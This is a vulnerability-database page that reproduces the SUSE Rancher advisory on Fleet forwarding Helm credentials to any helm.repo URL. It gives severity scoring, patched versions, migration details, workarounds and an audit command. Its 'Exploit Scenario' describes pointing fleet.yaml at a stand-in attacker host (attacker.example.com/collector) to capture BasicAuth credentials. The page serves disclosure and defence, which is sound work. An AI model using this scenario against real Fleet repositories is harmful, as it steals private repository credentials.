Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Git push access constitutes low privilege (PR:L); no user interaction or special conditions are needed (AC:L/UI:N); credential exfiltration crosses a scope boundary to the attacker's server (S:C) with limited confidentiality impact (C:L) and no integrity or availability effect.
Primary rating from NVD.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Lifecycle Timeline
1DescriptionNVD
Impact
A vulnerability has been identified in Fleet when the helmRepoURLRegex field isn't set on a GitRepo resource. Fleet's bundle reader forwards Helm authentication credentials (BasicAuth) to any URL specified in the helm.repo field of a fleet.yaml file.
An attacker with git push access to a Fleet-monitored repository can exploit this behavior by specifying a malicious URL in helm.repo. This causes the Fleet controller to send the configured Helm repository credentials to the attacker’s server.
As a result, the attacker can capture the username and password that an administrator configured to access a private Helm chart repository. However, the response body from the attacker's server isn't included in the error message (this behavior was fixed in Fleet v0.13.3 and later), which prevents additional internal data from leaking through the status condition.
The final severity of this vulnerability depends on the specific permissions of the leaked credentials.
Fleet recommends you to:
- Review your system for potentially leaked credentials.
- Replace any credentials that might be compromised.
Please consult the associated MITRE ATT&CK - Technique - Stored Data Manipulation and MITRE ATT&CK - Technique - Steal Application Access Token for further information about this category of attack.
Patches
To resolve this vulnerability, upgrade to a patched version of Fleet. The patched version of Fleet now requires you to set the helmRepoURLRegex field on the GitRepo. If the helmRepoURLRegex is empty or missing, Fleet won’t send credentials, regardless of the URL specified in fleet.yaml.
When you upgrade, a Helm pre-upgrade job automatically migrates existing GitRepo resources that have helmSecretName or helmSecretNameForPaths configured but lack a helmRepoURLRegex. The migration job performs the following actions:
The job extracts the scheme and host from the Helm repository URLs already stored in the resource's Bundles. For example, a GitRepo with Bundles referencing https://charts.example.com/stable receives helmRepoURLRegex: "^https://charts\.example\.com/". This limits credential forwarding to the origins already in use before the upgrade. Migrated resources are annotated with fleet.cattle.io/helm-regex-auto-migrated: "true" so you can easily audit them.
If no Bundles with Helm repository URLs exist during the migration (for example, if the GitRepo has never successfully synced), helmRepoURLRegex remains empty and credentials aren't forwarded. You must set this field manually before Fleet will send credentials.
The migration job runs only once per installation and records its status in a ConfigMap named fleet-helm-url-regex-migrated in the Fleet system namespace. Any GitRepo resources you create after the upgrade require an explicit helmRepoURLRegex to forward credentials.
Patched versions of Fleet include releases v0.15.2, v0.14.6, 0.13.11, and v0.12.15.
Workarounds
If you cannot immediately upgrade to a patched version, use the following methods to mitigate the risk and audit your environment. Set helmRepoURLRegex on all GitRepo resources that use helmSecretName. Ensure the regular expression matches only your legitimate Helm repository URL.
Example configuration:
apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
name: my-app
namespace: fleet-local
spec:
repo: https://git.example.com/org/my-app.git
helmSecretName: helm-creds
helmRepoURLRegex: "^https://charts\\.example\\.com/.*"After upgrading to a patched version, review all auto-migrated GitRepo resources by running the following command:
kubectl get gitrepo -A -o json | \
jq -r '.items[] | select(.metadata.annotations["fleet.cattle.io/helm-regex-auto-migrated"] == "true") | "\(.metadata.namespace)/\(.metadata.name): \(.spec.helmRepoURLRegex)"'Verify that the auto-derived regular expression matches only your intended Helm repository origins. If a regular expression is broader than necessary, replace it with a more specific pattern.
Credits
This security issue was reported by the following collaborators according to our responsible disclosure policy:
- Radisauskas Arnoldas from NATO and the NATO Cyber Security Centre (NCSC).
- FluentLogic's security team.
References
If you have any questions or comments about this advisory:
- Reach out to the SUSE Rancher Security team for security related inquiries.
- Open an issue in the Rancher repository.
- Verify with our support matrix and product support lifecycle.
AnalysisAI
Helm credential exfiltration in Rancher Fleet allows an attacker with git push access to a Fleet-monitored repository to redirect configured Helm BasicAuth credentials to an attacker-controlled server by manipulating the helm.repo field inside a committed fleet.yaml. Affected deployments are those where GitRepo resources carry helmSecretName or helmSecretNameForPaths but lack a helmRepoURLRegex allowlist - the default state for most pre-patch installations across the v0.12, v0.13, v0.14, and v0.15 release lines. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the attacker holds git push access - either direct commit rights or the ability to get a pull request merged - to a specific repository tracked by a Fleet `GitRepo` resource. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The vendor-assigned CVSS 3.1 score of 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N) is well-calibrated: network access with low privilege (git push rights) and no user interaction are required, and the scope change to C:L correctly captures credential exfiltration without overstating impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A developer with contributor-level git access to a repository monitored by Fleet edits `fleet.yaml` to set `helm.repo: https://attacker.example.com/collector` and pushes the change. On the next reconciliation cycle, the Fleet controller detects the updated manifest, reads the `helmSecretName` value from the `GitRepo` spec, and issues an HTTP request to the attacker's endpoint with the configured BasicAuth `Authorization` header containing the plaintext username and password for the private Helm chart repository. … |
| Remediation | Upgrade Fleet to one of the patched releases - v0.15.2, v0.14.6, v0.13.11, or v0.12.15 - as documented in the vendor advisory at https://github.com/rancher/fleet/security/advisories/GHSA-hx4v-cxpf-vh8m. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41863
GHSA-hx4v-cxpf-vh8m